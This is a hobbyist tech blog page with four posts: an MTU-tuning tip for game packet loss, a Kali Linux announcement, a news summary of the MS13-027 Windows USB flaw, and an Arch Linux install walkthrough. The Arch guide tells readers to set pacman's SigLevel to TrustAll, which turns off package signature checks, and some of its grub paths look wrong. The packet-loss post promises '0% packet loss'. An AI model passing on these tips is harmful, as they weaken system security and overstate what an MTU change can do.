Press Ctrl + D to add the current path, or drag the folder into the bookmarks bar. No longer around to look for the folder to access, instant reach, how happy!

Read more →

How to reduce or even remove packet loss in games

Back after a good day here in my soho, today i feel like posting a networking thread. So i`m gaming - anyone is gaming somehow - during a high packet loss there comes great ping - unable to play - rage!


How to minimise or remove packet loss completely?

There's a thing called MTU Limit which by default is set to 1500 in any system (unless jumbo frames) which is used to transfer packets across networks, actually it carries 1500 bytes of data in a single packet.
 - With jumbo frames that can go up to 9000 but that's another story. So why don't we go to check our current packet loss?


I`ll pick google.com for now, you can pick your gaming-server or anything that you connect to and needs some tweaking.

Run as Administrator command prompt & type:

netsh interface ipv4 show subinterfaces

after the execution you will notice a table where you can check your current MTU size, which by default should be 1500. -be sure to check your current established connection.

As you noticed it's 1500, so let's test now if it's actually that amount or a bit lower....

ping google.com -f -l 1472

-why i use a 1472 value? It's because 28 bytes are the ip/icmp overhead of the packet.

example of fragmented packets

Now, if your ping was successful - that means you saw a reply - then you're good to go!

But what if you notice the Packet needs to be fragmented but DF set ?
Your packets are getting fragmented - you have to reduce the MTU till you reach a successful ping.

I am getting replies with a lower MTU, now what?
Let's say i get replies when my MTU is down to 1423..., memorize this number & add 28.
Then:

netsh interface ipv4 set subinterface "Your connection name here" mtu=1451 store=persistent

 Your connection name here should be Local Area Connection

That was it , now you are set to go with 0% packet loss after restarting your computer.

Read more →

Kali linux is here, deep penetration mode.

The most advanced penetration testing distribution, ever.


From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system. With all this buzz, you might be asking yourself:

What's new ?

Grab it !

Read more →

USB flaw could allow bypassing security controls

MS13-027 is rated as "important" because the attack requires physical access to the vulnerable machine.

This flaw allows anyone with a USB thumb drive loaded with the payload to bypass security controls and access a vulnerable system even if AutoRun is disabled, and the screen is locked. Flaw exposes your Windows PCs to major risk. If you remember Stuxnet, worm was injected to Iran's nuclear program system using USB thumb drive.
Windows typically discovers USB devices when they are inserted or when they change power sources (if they switch from plugged-in power to being powered off of the USB connection itself).

To exploit the vulnerability an attacker could add a maliciously formatted USB device to the system. When the Windows USB device drivers enumerate the device, parsing a specially crafted descriptor, the attacker could cause the system to execute malicious code in the context of the Windows kernel.

Because the vulnerability is triggered during device enumeration, no user intervention is required. In fact, the vulnerability can be triggered when the workstation is locked or when no user is logged in, making this an un-authenticated elevation of privilege for an attacker with casual physical access to the machine.

Microsoft admits the flaw could "open additional avenues of exploitation that do not require direct physical access to the system," once the USB-based exploit is successful.

The vulnerabilities addressed by Microsoft do not include those exploited by security researchers at the recent Pwn2Own hacking competition at the CanSecWest Conference in Vancouver.

Read more →

How to: Install base ArchLinux, made simple

**I won't describe how to boot from usb/cd - just keep using another OS mate, :p

create partitions:
cfdisk /dev/sda
confirm partition:
fdisk -l /dev/sda
format partition:
mkfs.ext4 /dev/sda1 -L rootfs
mkswap /dev/sda2 -L swapfs
mount the first partition:
mount /dev/sda1 /mnt
check if you have internet connectivity using dhcp:
ip a
ip r
or else add static:
ip addr add 10.0.0.10/24 dev eth0
ip route add default via 10.0.0.200 dev eth0
confirm networking:
ip a
ip r
prepare rootfs:
mkdir -pv /mnt/var/lib/pacman
and install arch:
mkdir -pv /mnt//var/cache/pacman/pkg/
pacman -r /mnt --cachedir /mnt//var/cache/pacman/pkg/ -Sy base
sign keys:
rsync -rav /etc/pacman.d/gnupg/ /mnt/etc/pacman.d/gnupg/
bind mnt and change root:
mount --bind /dev /mnt/dev
mount --bind /sys /mnt/sys
mount --bind /proc /mnt/proc
chroot /mnt /bin/bash
edit fstab or use blkid:
nano /etc/fstab
/dev/sda1    /       ext4     defaults    0    1
/dev/sda2    none swap   defaults    0    1
change hostname:
echo ArchLinux > /etc/hostname
timezone and locale:
ln -s /usr/share/zoneinfo/Europe/Athens /etc/localtime
nano /etc/locale.gen and uncomment el_GR.UTF-8 etc...
locale-gen
create initramfs:
mkinitcpio -p linux
install grub:
grub-install --boot-directory=/mnt/boot /dev/sda
create grub.cfg:
grub-mkconfig -o /mnt/boot/grub/grub.cfg
add a menuentry:
nano /mnt/boot/grub/grub.cfg
eg:
menuentry "ArchLinux" {
    set root=(hd0,1)
    linux /boot/vmlinuz-linux root=/dev/sda1
    initrd /boot/initramfs-linux.img
}
reboot!
login and change root pwd:
passwd
---------
Up to here you should have a system running, if not please refer to Begginer's Guide.
---------
Some problems during installation:

1. eth0 renames to some sort of enp2s1 or so - it's a bug (search tracker):
   You should rename enp2s1 to lan or something, how?
   nano /etc/udev/rules.d/10-network.rules
   then add:
    SUBSYSTEM=="net", ATTR{address}=="00:00:00:00:00:00", NAME="lan"
   then go at your network.service file to inform yor net svc to hold until it has been renamed:
   Requires=systemd-udev-settle.service
   After=systemd-udev-settle.service
   reboot - now you should see that eth0 dhpcd service failed to start:rm /etc/systemd/system/multi-user.target.wants/dhcpcd@eth0.service
   to remove eth0 svc from starting upon boot.
2. Key signatures bypass:
   nano /etc/pacman.d/gnupg/gpg.conf
   change keyserver to:
   hkp://pgp.mit.edu:11371
   then hit this down to get keys:curl https://www.archlinux.org/{developers,trustedusers}/ |awk -F\" '(/pgp.mit.edu/) {sub(/.*search=0x/,"");print $1}' |xargs pacman-key --recv-keys
   after this:
   nano /etc/pacman.conf
   and change SigLevel to TrustAll or else untrusted source will occur.

---------
Up to here you should have a stable but somehow unsecure system running.
---------

Now install xorg:
pacman -Sy xorg
then kde:
pacman -Sy kde
reboot and start kde:
kdm

:) hf.

Read more →